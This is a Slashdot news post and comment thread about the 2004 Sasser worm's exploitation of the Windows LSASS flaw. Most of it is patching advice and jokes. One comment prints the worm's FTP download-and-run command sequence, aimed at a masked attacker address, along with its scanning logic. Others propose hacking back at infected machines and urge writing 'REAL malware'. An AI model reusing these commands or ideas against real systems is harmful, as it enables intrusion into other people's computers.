New Windows Worm on the Loose

Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."

ah...

the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

Re:ah...

[Interruach]

ahh, the luxury of the first box after the NAT being a linux proxy server that serves my entire internal network.

-- I see your nat box and raise you a proxy server.

Re:ah...

the luxury of being behind a nat box with all ports off and not having to deal with such nonsense

Yeah... till your buddy comes over to play Counterstrike and plugs into your hub infecting your machine.

Re:ah...

[Lord+Kano]

Pussies! I'm whistling into a telephone receiver.

LK

Re:ah...

[JPriest]

1990, the year someone said it was a bad idea to have default services in listening state.
1999, the year MS forgot was was said back in 90.
2003, the year of Microsofts new security initiative.
2004, the year of the Windows worms.
XP SP2, the patch for mentioned "listening state" error.

Re:ah...

[Sj0]

I just got hit with wone of these lsass viruses a few weeks ago.

Completely patched.

My stupidity was DMZing my firewall. Stupid, STUPID.

Freinds don't let freinds open their firewalls. Not even to play video games, no matter how many processes they have deactivated.

I think the tragedy here is that most "regular power users" (ie. the folks who think that they're big shit because they can install antivirus software and change their windows desktop) probably don't realize that it's entirely possible to have a completely patched windows machine that can still get infected by a virus if you plug it right into the internet. I honestly think these things are reaching a critical mass. It'll be interesting to see exactly how that manifests.

Re:ah...

[Master+of+Transhuman]

I have DOS - which doesn't listen to anything unless you tell it to.

Beat that.

(Well, I'm fibbing, I actually run Windows 2000, Windows XP and Red Hat 7.3. But I remember when I used to tell clients at BOFA that modem security was not an issue with DOS since if you weren't running XTalk or something, DOS could care less if the modem was on. Of course, this meant porn took a lot longer to download...)

Re:ah...

[hawkbug]

And thank you for your lazy attitude - you're the reason spammers can control broadband connected zombie boxes to fill my inbox with massive amounts of shit.

I Use X Windows

[craXORjack]

Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

What is this 'Windows Update' of which you speak?

Re:I Use X Windows

[temojen]

I believe it's a cludgey microsoft variant of

"emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

except that it requires you to reboot several times and repeatedly interact with it.

Re:I Use X Windows

[bamf]

You've probably already installed it, just look for KB835732 in your list of installed updates.

Re:I Use X Windows

[gnu-generation-one]

"What is this 'Windows Update' of which you speak?"

Full text, in case of slashdotting:

" Thank you for your interest in Windows Update

Windows Update is the online extension of Windows that helps you get the most out of your computer.

You must be running a Microsoft Windows operating system in order to use Windows Update."

Re:I Use X Windows

[pantherace]

That's fine for ONE computer, possibly even easier. (That's debatable, very debatable.) However, it only updates the OS & 1 office suite. If you would be so kind as to tell me about something that allows you to install applications to multiple computers from one on windows that doesn't cost a relatively large amount, such as Norton Ghost (which still requires a fairly complicated install, but fortunately only on one machine)?

SUS again updates only the OS + Office suite, so that doesn't cut it.

I would certainly prefer to wait a few hours for a test machine to compile a package and then be able to deploy it (binary) to all the machines after testing. It's all in the choice of design, Windows is still at heart a single user operating system, Linux, Unix, BSD, etc are all multi-user operating systems, and it is reflected in installs.

Re:I Use X Windows

[SpectreGadget]

oh yes:

"emerge sync; emerge -uD --fetchonly world; emerge -uD world; etc-update"

isn't kludgy in the least and very intuitive. I prefer "apt-get dist-upgrade" myself.

Re:I Use X Windows

You must be running a Microsoft Windows operating system in order to use Windows Update.

Those monopolistic bastards.

Re:I Use X Windows

[brunson]

It's kinda like:

yum --ask-lots-of-useless-questions=yes \
--reboot-for-no-apparent-reason=alot \
--resolve-dependencies-without-my-help=no \
update

Re:I Use X Windows

[Suidae]

Ha, you all suck, I just tell my network admin to update everything so I can get on with the drinking beer and watching porn.

Re:I Use X Windows

[reallocate]

Well, as they say, YMMV.

I don't use a Windows machine from the adminstrator account. When I need to run Update, I switch over and do it as the administrator. I read before I install, and I don't install nonapplicable updates. I don't trust anyone's automagic updaters.

When I've used Gentoo, it's been as a desktop machine. I've installed it 3, maybe 4, times, always building from the minimal install (the one that takes a day and a night, and most of the second day...). I don't much about and I don't install "foreign" software. Every time I've used Gentoo, it goes belly up after I've installed some update or another.

Gentoo may have an excellent packaging system, but I don't have time or energy or purpose to become an expert on one more proprietary packaging and updating scheme.

Linux touts "choice" all the time, and rightly so. But the fact is that having a plethora of distribution-specific packaging schemes is a major pain that limits choice.

So long as the Linux community fails to agree to, implement, and use a single packaging and updating scheme, Linux will be a nonstarter outside the geek and corporate worlds.

Mutex Trapping

[Mr.+Darl+McBride]

About the first thing any Windows program does is to attempt to acquire a mutex to see if the program is already running. In the case of this worm, that's "Jobaka3l." If that exists, the worm dies off without running.

Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.

This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.

Re:Mutex Trapping

[The+Raven]

Toolbars and similar items would not be prevented by blocking mutex's as far as I know, because they don't create one. They run under the IE process.

However, for most other types of spyware I completely agree, that would be an excellent idea for screening running processes.

Re:Mutex Trapping

You can set permissions in the registry per key.

Make it impossible to write to HKLM/software/microsoft/windows/currentversion/run

Re:Mutex Trapping

[stef0x77]

Use regedt32.exe (which is an older incarnation of regedit), go to the key in question, choose Security | Permissions ... from the menu etc...

Re:Mutex Trapping

[kyhwana]

Err, Startup Monitor does just that.
Well, it doesn't protect the registry, but it does pop up a dialog box whenever something tries to add itself to those registry entries..

Re:Mutex Trapping

[cscx]

Run "regedit", then right click any key, and select "Permissions" -- you get a standard NTFS permissions box to fiddle with at your leisure.

Note this only works on NT-based systems (e.g., WinXP)

Re:Mutex Trapping

[Verteiron]

It exists already. There are several, some free, some not, but the most useful (and free!) one I've found so far is the brand-new Spybot TeaTimer. It's available with the newest release candidate. You can download that here (link at the bottom of the forum post). Just run Spybot SD, do the immunization and such, run the scan, then switch it to Advanced mode and activate the "resident protection". Bingo. Nothing will ever write itself into your startup, or install a BHO, or toolbar, or change your homepage, without your knowledge and permission. Bear in mind it's a release candidate and there may be bugs; I know the Teatimer sometimes shuts off when you run the main Spybot program, and you have to go activate it again. Other than that it seems to work like a charm.

Re:Mutex Trapping

[Foolhardy]

You can also enable auditing that will record attempts to access keys you want to watch in the same dialog (see Advanced->Auditing). But first, you have to enable the auditing policy: in the control panel, go to Administrative Tools->Local Security Policy. Then Local Policies->Audit Policy. Registry keys are considered objects.
Access attempts will show up in the event viewer.
Note:use regedt32.exe for Win2000 or eariler. For later versions, regedit.exe does everything (under Edit->Permissions).

Huh?

[grub]

A new worm?

May 01 07:59:49.306654 rule 0/0(match): block in on dc0: xx.xx.xx.xx:xxxx > yy.yy.yy.yy:yyyy: S 2881286568:2881286568(0) win 32640 (DF)

Oh, there it is.

Removal Instructions

[modifried]

For anyone already infected, Microsoft has manual removal instructions for the worm, located here:

http://www.microsoft.com/security/incident/sasser. asp

Re:Removal Instructions

[blincoln]

Looks like they just cut and pasted that page.

Do you create all your HTML documents from scratch?

This worm release is pretty cool, I think. This is the first time I've got to see the patch deployment process I built with a couple of other people from my group send out patches to the entire company and get pretty much everybody taken care of before the worm was released. We built it from SMS SUS and a bunch of in-house components. 11,000 workstations across the country patched in less than a week, and we could have done it even faster in an emergency.

Regular SUS took care of our servers a week ago.

ah Nice, more work =)

[Quazion]

Atleast for me as the local consumer support guy.

Thanks Microsoft.

HAHA

[D-Cypell]

A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

The add server must be based on Microsoft's new Irony.NET framework!

Re:HAHA

[yulek]

A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!

i realize you were mostly joking, but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it. and since current viruses are not true malware, the fact that the machine is infected doesn't even matter to the cheap contractor admin "running" the box. as someone mentioned in another story's comment, it's time to make some REAL malware and wake these ijits up.

Re:HAHA

[Lothsahn]

Actually, current viruses are real malware, especially the ones that try to shut down virus scanners.

They cause the computer to run really slow, and screw things up, including networking settings, killing IE, destroy the cryptography service, so that you can't get updates, and the ability to repair the TCP/IP layer.

When you get multiple viruses on a machine, they can cause it to not even startup--Especially the ones that try to shut down virus scanners (Gaobot).

I know they're not malware in the sense that they format your HD or anything, but when your server runs at 10% of it's normal speed, that's enough to take down almost any operation.

Re:HAHA

but the fact is windows server cost of ownership IS lower because you don't need a smart person to run it.

And that, your honour, concludes my evidence showing why the Internet is such an insecure mess.

Visit Windows Update?

No need, I receive all the Windows critical updates by email. I don't know how I got subscribed to that mailing list, but it's damn convenient.

Dang...

[kennylives]

I have a Mac, you insensitive clod...

Re:Dang...

[skinfitz]

Well look on the bright side - worms and viruses are the only things that you have less of than games.

Security Update Dates

[TheUnFounded]

You know, normally these updates are available a good 3 or 4 months before the worm becomes available. This one was updated about 3 days ago. And MS claims to be beefing up their security efforts. ...

Re:Security Update Dates

[Unknown+Relic]

Is that reduced timeline maybe an example of what this /. article from a couple months ago was talking about? Essentially it stated that a lot of the new worms are actually being caused by the reverse engineering of patches to easily find exploits. Some machines will of course be patched, but as we all know, a huge number of machines will remain unpatched and vulnerable for months to come. If this is the case, Microsoft can hardly be faulted for getting the patch out only a few days before the exploit, since it's the patch itself that potentially prompted its creation. The really interesting thing is that if this is the case and Microsoft is actually increasing their security efforts and releasing more patches, we could actually see more worms released targetting unpatched systems. For them, this really isn't a good situation to be in - the more they do correct problems with their operating systems, the more exploits hit the unpatched machines, making it look like their enhanced focus on security is a joke.

YA Windows-only software title

In light of this, would someone please explain why I would ever want a Mac? None of the really good viruses or worms are ever ported to it, no matter how successful they are!

Loose not lose

[Brian+Dennehy]

I'm impressed that they got the headline right!

Same old, same old....

[gnuman99]

Same old news about another worm. Nothing to see here, move along.

Seriously, hasn't MS learnt anything about the Internet yet? Why do they keep insisting to keep all of these ports open all the time? Why so many services running out of the box? Why can't people even close some of the listening ports?

If MS was any serious about security, they would have all ports closed be default. Or at least have a possiblity to closing them down during install.

How it works

[mrneutron]

It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.

It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):

open XXX.XXX.XXX.XXX 5554

anonymous

user

bin

get XXXXX_up.exe

bye

XXXXX_up.exe

If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:

The IP addresses generated by the worm are distributed as follows:

50% are completely random

25% have the same first octet as the IP

address of the infected host

25% have the same first and second octet as the IP address of the infected host.

The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.

See:

• http://securityresponse.symantec.com/avcenter/ve nc/data/w32.sasser.worm.html

Re:Blaster-style? Uh-oh.

[FractusMan]

From the call volume here at work (an ISP), I'd say a LOT. We went from 0 to a couple hundred in queue in an hour. That was last night. Today, it's still as strong.

Help the poor bastards

[nazsco]

The worm seems to install a ftp server on infected machines. So, wouldn't it be nice to have every box that detects a connection on port 554, reply with an upload of a new wallpaper to the infected windows box with some message like "install a firewall, moron"

I consider it a public service. Maybe you can even deduct the bandwith for the upload from you tax.

Days like this...

[C0rinthian]

I REALLY hate working dial-up tech support.
(ring)
sigh....

some important points

[R_V_Winkle]

In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.

Sasser generates traffic on TCP ports 445, 5554 and 9996.

The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:

http://www.microsoft.com/technet/security/bullet in /MS04-011.mspx

Windows update freaking out!

[nazsco]

after reading this on the /. front page, i runned the windows update, that i don't visit for more than a year...

and after some time, a windows pops up with the text:
"The software you are instaling has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
"This software will *not be instaled*. Contact your system administrator."

Ok, so i contact myself, and wonders what the hell?!?

I just give M$ a lot of information about the operating system that i'm running... they wrote the frign thing, and even so, they don't know what will run in it, or what will pass their own crap compatibility verification!

but well, that's it... i just click "OK" --the only button-- and see the same windows appears 3 times more... and blissfuly keep my ignorance of what's going on with the instalation.

Re:Windows update freaking out!

[NuclearDog]

That always annoyed the hell out of me.

"That action can not be performed. Please contact your system administrator."

I always felt like and idiot talking to myself...

Re:Windows update freaking out!

[Jarnis]

Your own fault disabling the Crypto service. Without it the winupdate cannot verify the signatures. Those stupid 'xp optimization guides' commonly tell you that disabling it is a good idea...

You must be an american

[empaler]

Only consumer whores and other types of idiots choose to toss out the computer instead of just wiping the hard drive and installing something else.

Well done, submitter!

[6Yankee]

How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!

Of course, then came the comments... :-)

I was wondering...

[lazy_arabica]

... if we replaced the posts of this thread with the messages posted after a previous worm-announcement, would anyone notice ? :)

Linux_Zealot says : 5 Insightful - I am using Linux now !
M$_wizard : 5 Interesting - Worms always appear after a security notice from Microsoft Knowledge Base ; so, openness is bad !
security_Teacher : 5 Insightful - Of course, no one should run anything as root but cricital administration tasks, and a firewall is essential.
n00b : -1 Troll - Windows Sucks !!!

Well... That's just a little... repetitive ;-)

Re:I was wondering...

[kasperd]

a firewall is essential.

It sure is. The last worm wouldn't have worked without one.

Could you try to find out?

[empaler]

After I changed email address, I couldn't figure out where I'd subscribed to that newsletter, either... I'd really like it back...

This totally sucks.

[mark-t]

I was never in any danger of being infected by this worm, but about 3 days ago, I noticed I was getting almost a steady stream of traffic on my lan when nobody was using any computers... A quick check with ethereal showed that it was all port 445 stuff, and I was getting as many as 10 packets every second coming from various IP addresses.

So for the past few days, I've had to live with part of my bandwidth getting chewed up by incoming packets that don't actually do anything but take up space. It effectively slowed the speed of downloads by about half. The rate of packets is starting to slow down now... finally (I guess as people patch their systems), but it still was highly annoying.

Anyways, I called my ISP when I first noticed it 3 days ago (after checking it with ethereal), and asked if they could help. They told me that this was caused by filesharing programs, which I knew wasn't the case becuase in fact the only port 445 stuff I've done is windows filesharing, and I've secured the one and only Windows system on my LAN against IP addresses other than other ones on my LAN from being able to access them. Needless to say, this answer did not impress me. Here I was, effectively being subjected to a DoS attack, and they are trying to tell me this is _my_ fault? Man, if I had any other choice for high speed internet, I'd be switching in a heartbeat.

Anyways, that's my story. Things like this totally bite because you can have a firewall and all the security precautions in the world, but worms like this still chew up your bandwidth.

Outside the firewall...

[BJZQ8]

I pity my educational counterparts in other districts...one in particular has probably a dozen Win2K/W2K3 machines sitting outside the firewall...no protection whatsoever. No, they do not do regular updates...just when something breaks. Oh well, they'll just hire their friendly neighborhood MCSE consultants to come in at $150 an hour to "sell them some protection." It seems like it's always firefighting with Windows anymore...And no, I do NOT run Windows on any server in my district...

Re:Removal Instructions [mirrors]

[AvantLegion]

Here's a few mirrors for those removal instructions, in case the rash of post-bug traffic slows things down:

http://fedora.redhat.com
http://www.gentoo.org
http://www.debian.org
http://www.linux-mandrake.com
http://www.slackware.com

Obligatory quote from Linux/*BSD/Mac users

[imnoteddy]

"Ha Ha!"
Nelson, various Simpsons episodes

Re:Dammit...

[Nonesuch]

want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...

LaBrea runs on FreeBSD too.

I use the "redirect" feature of the packet filter to do the equivalent of proxy transparency on ports 135,139,445,4444,9996 to local ports with a local listener.

The Sasser worm starts 128 scanning threads to pseuod-random destinations, and on a fast machine can really pump out the packets. If you give it something to talk to on ports 445 and 9996, that considerably slows the scanning behavior.

Re:already feeling it on college campuses

[Radon+Knight]

> If I was in charge of a university's computer systems,
> absolutely no proprietary, closed source software would be
> allowed anywhere on my network, especially not the parts
> accessible to students

So, preventing your students from being unable to run Mathematica, Maple, Matlab, Visual Studio,... is educationally beneficial in what way?

Yes, closed source software has problems. So does open source. An all-out ban either way helps no one and solves nothing.

killing IE

[Beer_Smurf]

You say "killing IE" like it's a bad thing.

Re:Linux is vunerable too (The anti-anti-windows F

[ajs318]

1. Linux isn't as good as Windows, Windows has more accountability and support.

Microsoft could withdraw support for Windows at any time. Linux has independent support from a community of users.

2. If Linux was used as much as Windows then Viruses would be as common, instead of incredable rare.

Linux is secure by design. Privilege separation, memory protection and so forth. Most distributions force you to create a non-root user at installation time.

3. Windows is cheaper then Linux even though Linux is free. It's a TCO type of thing.

What you mean is that it's cheaper to hire somebody to fix a Windows box than a Linux box. There is a grain of truth in this. Windows often packs up for no appareny reason. Almost any unskilled monkey can "fix" a broken Windows box just by hoicking out the power lead, counting to ten and putting it back. Linux only ever misbehaves with a good reason, and requires someone who knows their arsehole from their earhole to fix it.

4. Gimp sucks compared to Photoshop.

This sounds like an ad hominem attack. At best it's a red herring. Photoshop is an Adobe product, nothing to do with Windows or Linux.

5. Open source is insecure by default. Only by hidding your secrets are they kept safe.

Thou smokest crack. If the security of your code depends on a secret that you hope an attacker will not discover, then as soon as an attacker discovers that secret then your code is insecure. The security of Linux does not depend on one big, centrally-kept secret. Cf. public key encryption.

6. IE is better then Firefox because my kids can play shockwave games on Disney.com

Then try the full version of Mozilla, which definitely supports the Flash player plugin {though I'm not convinced you aren't just lying, Firefox might well support plugins}. If you don't need Flash, but you would like tabbed browsing, pop-up blocking, a Javascript debugging console, cookie management and speed, then Firefox certainly does it.

7. MS has Exchange, Linux doesn't.

Linux has Sendmail. 'Nuff said.

8. OO.org sucks compared the usability of Office

You haven't said how OO.o "sucks", nor even which release you are talking about, so I have to presume you are merely parroting.

9. Linux isn't ready for the Desktop.

You are merely parroting.

10. Grandma can't install Linux.

Awwwwk! Pieces of eight! Polly want a cracker! Grandma can't install Windows either.

11. Can't play Everquest on Linux.

Blame the makers of Everquest, or find another game to play. See also point 4.

12. Users are the problem, Not Microsoft.

Just goes to show ..... if you say enough things then at least one of them might turn out to be true. Many users need to get a clue, I'll agree. But I have to say that writing a mail client which treats unknown file types as "executable" -- and executes them without the user's consent -- sounds seriously like aiding and abetting virus propagation. Yeah, that was years ago. See also point 9.

goodbye windows update

[sir_cello]

Using Symantec AV, I LiveUpdate'd signatures, only to find that it decared System32/w32sup.exe as a trojan and quarantined it.

Patching / Firewalls

[gorfie]

Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?

Should read "Of course, all good Slashdotters patch their systems and have a firewall, don't you?".

Running something other than Windows is not a good reason to ignore security.